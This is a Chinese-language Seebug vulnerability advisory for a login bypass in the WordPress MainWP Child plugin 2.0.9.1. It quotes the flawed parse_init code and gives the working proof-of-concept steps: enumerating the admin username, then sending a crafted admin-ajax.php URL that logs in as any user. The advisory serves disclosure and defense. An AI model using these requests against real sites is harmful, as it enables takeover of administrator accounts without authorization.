Wordpress MainWP Child Plugin 2.0.9.1 /class/MainWPChild.class.php 登录绕过漏洞

2015-03-16T00:00:00
ID SSV:89071
Type seebug
Reporter Root
Modified 2015-03-16T00:00:00

Description

<p>/class/MainWPChild.class.php</p><pre class=""> $this->posts_where_suffix = '';

    $this-&gt;comments_and_clauses = '';

    add_action('template_redirect', array($this, 'template_redirect'));

    add_action('init', array(&amp;$this, 'parse_init'));

    add_action('admin_menu', array(&amp;$this, 'admin_menu'));

    add_action('admin_init', array(&amp;$this, 'admin_init'));

    add_action('init', array(&amp;$this, 'localization'));



    ……

function parse_init()

{

    global $current_user; //wp variable



    //Login the user

    if (isset($_REQUEST['login_required']) &amp;&amp; ($_REQUEST['login_required'] == 1) &amp;&amp; isset($_REQUEST['user']))

    {

        $username = rawurldecode($_REQUEST['user']);

        if (is_user_logged_in())

        {

            global $current_user;

            if ($current_user-&gt;wp_user_level != 10 &amp;&amp; (!isset($current_user-&gt;user_level) || $current_user-&gt;user_level != 10) &amp;&amp; !current_user_can('level_10'))

            {

                do_action('wp_logout');

            }

        }



        if (!is_user_logged_in() || $username != $current_user-&gt;user_login)

        {

            if (!$this-&gt;login($username))

            {

                return;

            }

</pre><p>当初始化时调用parse_init方法。当用户传入用户名的时候,只验证了用户名就登陆了,导致当攻击者获取到网站管理员的用户名后可以登录任意用户。<br></p><p>首先访问目标站点获取管理员登录名:</p><pre class="">http://10.211.55.3/wordpress?author=1</pre><p>利用登录名拼接URL:</p><pre class="">http://10.211.55.3/wordpress/wp-admin/admin-ajax.php?action=init&login_required=1&user=admin</pre><p>通过浏览器访问,发现已经返回Set-Cookie头。</p><p> </p><p><img alt="0AB88841-E5EB-4D6C-B54C-19F2F6027C89.png" src="https://images.seebug.org/@/uploads/1434002730976-0AB88841-E5EB-4D6C-B54C-19F2F6027C89.png" data-image-size="1302,758"><br></p><p>访问后台,已经成功登录:</p><pre class="">http://10.211.55.3/wordpress/wp-admin/</pre><p> </p><p><img alt="5FC75DDB-C31D-4FFA-9234-51A646516A05.png" src="https://images.seebug.org/@/uploads/1434002755702-5FC75DDB-C31D-4FFA-9234-51A646516A05.png" data-image-size="1378,630"><br></p>